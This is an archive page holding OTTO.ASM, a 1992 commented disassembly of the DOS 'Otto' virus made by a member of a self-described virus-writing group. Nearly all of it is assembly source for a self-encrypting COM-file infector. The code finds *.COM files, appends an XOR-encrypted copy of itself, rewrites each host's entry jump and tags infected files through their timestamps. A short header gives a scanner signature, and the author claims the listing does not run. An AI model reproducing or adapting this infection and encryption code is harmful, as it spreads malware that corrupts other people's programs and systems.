home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / ASM-O.ZIP / OTTO.ASM < prev    next >
Encoding:
Assembly Source File  |  1992-05-13  |  7.4 KB  |  284 lines
  1. ;******************************************************************************
  2. ;                Otto Virus
  3. ;
  4. ;               Disassembled by Data Disruptor
  5. ;           (c) 1992 RABID International Development
  6. ;                 (May.12.92)
  7. ;
  8. ;         Original virus written by YAM (Youth Against McAfee) 1992
  9. ;
  10. ; Notes: Otto Schtuck (Pardon the spelling?) claims that this is a super-
  11. ;     encrypting virus. Well, it took me all of two minutes to get the virus
  12. ;     into it's disassembled form. Try again guys. It wasn't half bad. For
  13. ;     this virus, I could not use the techniques outlined in my article in
  14. ;     Censor Volume 1~, therefore, I had to use another method (which, 
  15. ;     coincidentally is a lot better). Be expecting "Decrypting Viruses
  16. ;     Part ][" in the next issue of Censor (Slated for release in early
  17. ;     June).
  18. ;
  19. ;     As always, these disassemblies compile but do not run. They are
  20. ;      intended to be used for "Hmm. Let's see how that group program's"
  21. ;     purposes only.
  22. ;
  23. ;                            Data Disruptor
  24. ;                                RABID
  25. ;
  26. ; ~ I don't know the reason why my method outlined in Censor I didn't work.
  27. ;   It could have had something to do with SMARTDRV and FSP conflicting in
  28. ;   memory. Nonetheless, another method was found.
  29. ;
  30. ; (Ok. So it's not one of my best disassemblies, but at least it shows how
  31. ;  one can decrypt encrypted viruses...)
  32. ;
  33. ; A scan for this virus is;
  34. ;
  35. ;    # Otto - Written by Otto Schtuck
  36. ;    "8A 24 32 E0 88 24 46" Otto Schtuck [Otto] *NEW*
  37. ;
  38. ; It does no damage, does not hide it's file increase, but preserves the time
  39. ; & date stamp. It does not display any message. It is a transient COM infector
  40. ; that will infect one file in the current directory each time it is run.
  42. ;******************************************************************************
  43.  
  44. file_handle    equ    9Eh            ; File handle location
  45. enc_bit        equ    0FFh            ; Encryption bit
  46.  
  47. code        segment    byte public
  48.         assume    cs:code, ds:code
  49.         org    100h
  50.  
  51. ;---
  52. ; Length of virus is 379 bytes...
  53. ;---
  54.  
  55. otto_vir    proc    far
  56. start:
  57.         jmp    short virus_entry    ; Virus entry here
  58. ;---
  59. ; This hunk of shit here looks encrypted. I couldn't be bothered to go any
  60. ; further...
  61. ;---
  62.  
  63. crypt_1        db    90h
  64.         db     12h, 44h, 75h, 64h, 6Eh,0C1h
  65.         db     0Eh,0EDh, 70h, 05h, 34h, 5Dh
  66.         db     77h,0EBh, 35h,0D4h, 35h, 46h
  67.         db     34h, 68h, 7Ch,0A2h, 05h,0C1h
  68.         db     24h, 49h, 34h, 4Eh, 6Ch,0F1h
  69.         db     33h,0D5h, 20h, 5Ch, 7Bh, 78h
  70.         db     08h, 88h
  71. crypt_2        db    69h
  72.         db    0C3h, 79h
  73.         db     08h, 25h, 33h, 3Ch
  74.         db    0B0h, 61h,0F2h, 11h, 6Ah, 5Dh
  75.         db     4Eh, 25h,0CBh, 2Fh,0D4h, 35h
  76.         db     5Ah, 7Ah, 6Bh, 71h,0EBh, 2Eh
  77.         db    0CEh, 31h, 44h, 19h, 00h, 1Fh
  78. virus_entry:
  79.         cmp    al,[bx+di-14h]        
  80.         popf                ; Pop flags
  81.         or    ax,bp
  82.         add    [bx+si],al
  83.         pop    si
  84.         push    si
  85.         sub    si,108h
  86.         pop    ax
  87.         sub    ax,100h
  88.         mov    ds:enc_bit,al
  89.         push    si
  90.         mov    cx,17Bh            ; 379 bytes
  91.         add    si,offset crypt_2
  92.  
  93. decrypt:
  94.         mov    ah,[si]
  95.         xor    ah,al
  96.         mov    [si],ah
  97.         inc    si
  98.         ror    al,1            ; Rotate
  99.         loop    decrypt 
  100.  
  101.         pop    si
  102.         mov    ax,enc_ax[si]
  103.         mov    dh,enc_dh[si]
  104.         mov    word ptr ds:[100h],ax
  105.         mov    crypt_1,dh
  106.         lea    dx,filespec        ; Set filespec
  107.         xor    cx,cx            ; Search for normal files
  108.         mov    ah,4Eh            ; Search for first match
  109. search_handler:
  110.         int    21h            
  111.         jnc    got_file
  112.         jmp    quit
  113. ;---
  114. ; Otto! If you want to save some bytes, you don't have to open the file in 
  115. ; order to get it's time. There are other ways around this...
  116. ;---
  117.  
  118. got_file:
  119.         mov    dx,file_handle        ; Get file handle from DTA
  120.         mov    ax,3D02h        ; Open file with read/write
  121.         int    21h            
  122.         mov    bx,ax            ; Save file handle in BX
  123.         mov    ax,5700h
  124.         int    21h            ; Get time/date from file
  125.         cmp    cl,3            ; Check timestamp
  126.         jne    found_host        ; Not equal to our timestamp?
  127.         mov    ah,3Eh            ; Then close the file and...
  128.         int    21h            ; 
  129.         mov    ah,4Fh            ; ...Search for next match
  130.         jmp    short search_handler
  131. found_host:
  132.         push    cx
  133.         push    dx
  134.         call    move_ptr_start        ; Move file pointer to start
  135.         lea    dx,[si+three_bytes]    ; Set buffer space for 3 bytes
  136.         mov    cx,3            ; Set for 3 bytes
  137.         mov    ah,3Fh            ; Read in file
  138.         int    21h        
  139.         xor    cx,cx            ; Set registers to...
  140.         xor    dx,dx            ; ...absolute end of file
  141.         mov    ax,4202h
  142.         int    21h            ; Move file point to end
  143.         mov    word ptr ptr_loc[si],ax
  144.         sub    ax,3
  145.         mov    adj_ptr_loc[si],ax
  146.         call    move_ptr_start
  147.         add    ax,6
  148.         mov    work[si],al
  149.         mov    cx,word ptr ptr_loc[si]
  150. ;---
  151. ; Set buffer space at end of the file so that we don't waste space in the
  152. ; virus
  153. ;---
  154.         lea    dx,[si+2A4h]    
  155.         mov    ah,3Fh            ; Read in file
  156.         int    21h        
  157.         push    si
  158.         mov    al,work[si]
  159.         add    si,offset copyright+4
  160.         call    encrypt
  161.         pop    si
  162.         call    move_ptr_start
  163.         mov    cx,word ptr ptr_loc[si]
  164.         lea    dx,[si+2A4h]        ; Load effective addr
  165.         mov    ah,40h            ; 
  166.         int    21h            
  167.         jnc    check_write        ; 
  168.         jmp    short quit
  169. check_write:
  170.         lea    dx,[si+105h]        ; Load effective addr
  171.         mov    cx,24h
  172.         mov    ah,40h            ; 
  173.         int    21h        
  174.         push    si
  175.         mov    cx,17Bh            ; 379 bytes
  176.         mov    di,si
  177.         add    di,offset copyright+1
  178.         add    si,offset crypt_2
  179.         rep    movsb            ; 
  180.         pop    si
  181.         push    si
  182.         mov    al,work[si]
  183.         mov    cx,17Bh            ; 397 bytes
  184.         add    si,offset copyright+1
  185.         call    encrypt
  186.         pop    si
  187.         mov    cx,17Bh            ; 397 bytes
  188.         lea    dx,[si+2A4h]        ; Set buffer to encrypted data
  189.         mov    ah,40h            ; Write out the virus to the 
  190.                         ; file
  191.         int    21h            
  192.         jc    quit            ; Jump if carry Set
  193.         call    move_ptr_start        ; Move file pointer to start
  194.         lea    dx,[si+new_jump]    ; Load DX with the new jump
  195.         mov    ah,40h            ; 
  196.         mov    cx,3            ; Set for 3 bytes
  197.         int    21h            ; Write out the new jump
  198.         jc    quit            ; Jump if carry Set
  199.         pop    dx
  200.         pop    cx
  201.         mov    cl,3            ; Set low order time with 
  202.                         ; our identity byte
  203.         mov    ax,5701h
  204.         int    21h            ; Set file date/time
  205.         mov    ah,3Eh            ; 
  206.         int    21h            ; Close the file
  207.  
  208. ;---
  209. ; Hmm. This routine looks a bit familiar... Maybe it was "borrowed" from the
  210. ; RAGE Virus we wrote...
  211. ;---
  212.  
  213. quit:
  214.         push    si            ; Save our SI
  215.         mov    al,ds:enc_bit        ; Load AL with value of the
  216.                         ; encryption bit
  217.         xor    cx,cx            ; 
  218.         add    cx,si            ; Load CX with original 3 bytes
  219.         add    cx,3            ; Adjust value for offset of
  220.                         ; virgin code
  221.         mov    bp,103h            ; Load BP with offset of 103h
  222.                         ; Where the virgin code starts
  223.         mov    si,bp            ; Copy this location to SI
  224.         call    encrypt            ; Encrypt this portion of the
  225.                         ; code
  226.         pop    si            ; Restore original SI
  227.         mov    bp,offset start        ; Load BP with offset of start
  228.                         ; of the virgin code
  229.         jmp    bp            ; Jump to start of virgin code
  230. otto_vir    endp
  231.  
  232. encrypt        proc    near
  233. encryption:
  234.         mov    ah,[si]
  235.         xor    ah,al
  236.         mov    [si],ah
  237.         inc    si
  238.         ror    al,1            ; Rotate
  239.         loop    encryption
  240.  
  241.         retn
  242. encrypt        endp
  243.  
  244.         db    'OTTO VIRUS written by:OTTO '
  245. enc_ax        dw    4353h            ; Encryption shit loaded in AX
  246. enc_dh        db    48h            ; Encryption shit loaded in DH
  247.         db    54h
  248. adj_ptr_loc    dw    4355h            ; Adjusted file pointer
  249.                         ; location (ptr_loc-3 bytes)
  250. work        db    4Bh            ; A work buffer
  251. ptr_loc        db    20h            ; File pointer location
  252. copyright    db    'COPYRIGHT MICROSHAFT INDUSTRIES '
  253.         db    '1992 (tm.)PQR'
  254. ;---
  255. ; Everything below here appeared as a bunch of hex shit I had to convert...
  256. ;---
  257.  
  258. move_ptr_start    proc    near
  259.         mov    ax,4200h        ; Move fp to start (B80042)
  260.         xor    cx,cx            ; (33C9)
  261.         xor    dx,dx            ; (33D2)
  262.         int    21h            ; Call DOS (CD21)
  263.         pop    dx            ; (5A)
  264.         pop    cx            ; (59)
  265.         pop    ax            ; (58)
  266.         ret                ; (C3)
  267. move_ptr_start    endp
  268.  
  269. filespec    db    '*.COM',0        ; Location 295h
  270.  
  271. three_bytes    db    0ebh,46h,90h        ; jmp 148 (Location 29Bh)
  272. new_jump    db    0e9h,4ah,00h        ; jmp 150 (Loc 29Eh)
  273.         push    ax            ; Loc 2A1h
  274.         dec    bp            ; Loc 2A2h
  275.         db    00h            ; Loc 2A3h
  276.  
  277. code        ends
  278.  
  279.  
  280.  
  281.         end    start
  282.  
  283.  
  284.